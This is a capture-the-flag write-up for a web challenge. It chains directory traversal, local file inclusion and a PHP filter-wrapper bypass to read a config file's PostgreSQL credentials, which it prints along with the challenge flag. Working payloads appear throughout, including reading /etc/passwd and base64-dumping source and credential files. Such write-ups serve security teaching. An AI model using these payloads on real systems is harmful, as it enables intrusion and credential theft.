Challenge Overview This challenge involves chaining multiple vulnerabilities — Directory Traversal, Local File Inclusion (LFI), and a PHP filter bypass — to extract database credentials and retrieve the flag directly from a PostgreSQL database. Key concepts: LFI, Directory Traversal, PHP filter wrapper, Base64 bypass, PostgreSQL enumeration The challenge URL exposes a suspicious file parameter: http://my-cool-blog.aws.jerseyctf.com/view-post.php?file=posts/cool-post-1 Run an nmap scan to fingerprint the target: nmap -sV my-cool-blog.aws.jerseyctf.com Port Service Version 22 SSH OpenSSH 8.7 80 HTTP Apache 2.4.63 Ubuntu 5432 PostgreSQL DB 18.0–18.2 The infrastructure is hosted on AWS EC2, confirmed by the reverse DNS record. Port 5432 being publicly accessible is an immediate red flag. Passing an invalid path to the file parameter triggers a verbose PHP error: This leaks two critical details — the app passes user input directly to file_get_contents(), and the absolute server path is /opt/server/. Verify LFI by reading /etc/passwd: ?file=../../../../etc/passwd Confirmed. We have LFI. Use the PHP Base64 filter wrapper to read view-post.php without the server executing it: ?file=php://filter/convert.base64-encode/resource=view-post.php Decoding the Base64 output reveals two security checks: Directory block — blocks any input starting with includes Content filter — blocks any file whose contents contain the string pg_connect The developer even Base64-encoded pg_connect within the source itself (cGdfY29ubmVjdA==) to obscure the check — a textbook security through obscurity mistake. Both filters collapse under the same PHP filter wrapper trick: The includes/ block only checks if input starts with includes — php:// bypasses it entirely The pg_connect content filter never fires because the file is Base64-encoded in memory before str_contains can inspect it Winning payload: ?file=php://filter/convert.base64-encode/resource=includes/db.inc Decode the returned Base64 to reveal the PostgreSQL credentials: host=my-cool-blog.aws.jerseyctf.com dbname=blog user=blog_web password=oPPNQ9vkMdAJx Connect directly to the remote database: psql -h my-cool-blog.aws.jerseyctf.com -U blog_web -d blog List the tables: \dt Query the flag table: SELECT * FROM flag; jctf{EgdbFYxQi4zmD5oovBpG7F5RJqRb7Tnd} PortSwigger – LFI / Path Traversal HackTricks – PHP Filter Wrapper PostgreSQL psql Documentation PayloadsAllTheThings – LFI Wordlist